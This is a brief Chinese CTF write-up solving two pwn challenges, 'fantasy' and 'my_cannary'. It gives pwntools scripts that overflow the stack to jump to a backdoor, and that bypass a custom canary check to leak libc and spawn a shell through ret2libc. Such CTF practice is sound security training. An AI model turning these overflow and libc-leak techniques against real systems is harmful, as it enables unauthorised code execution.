GXY复现

fantasy

右后门,简单的栈溢出

1
2
3
4
5
6
7
8
9
# -*- coding: utf-8 -*-
from pwn import *
context.log_level = 'debug'
p = remote('183.129.189.60','10025')
#p = process('./fantasy')
elf = ELF('fantasy')
libc = elf.libc
p.sendline('a'*0x38+p64(0x400735))
p.interactive()

my_cannary

这个需要看反汇编代码
有个xor rdx,[ebp-8];这个里面rdx是可控的,需要是一个地址,ebp-8也可控
通过这里的检验,然后发现程序有system函数,再泄露获取shell就可以了

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
from pwn import *
#context.log_level = 'debug'
p = remote('183.129.189.60','10026')
#p = process('./my_cannary')
elf = ELF('my_cannary')
libc = elf.libc

payload = 'a'*0x30+p64(elf.symbols['gift'])+p64(0)+'a'*8
payload += p64(0x400a43)+p64(elf.got['puts'])+p64(elf.plt['puts'])+p64(0x400998)

p.sendline(payload)
libc_base = u64(p.recv(6).ljust(8,'\x00')) - libc.symbols['puts']
p.success('libc_base: '+hex(libc_base))

bin_sh = libc.search('/bin/sh').next()+libc_base
p.success('bin_sh: '+hex(bin_sh))

payload = 'a'*0x30+p64(elf.symbols['gift'])+p64(0)+'a'*8
payload += p64(0x400a43)+p64(bin_sh)+p64(0x4008BE)
p.sendline(payload)

p.interactive()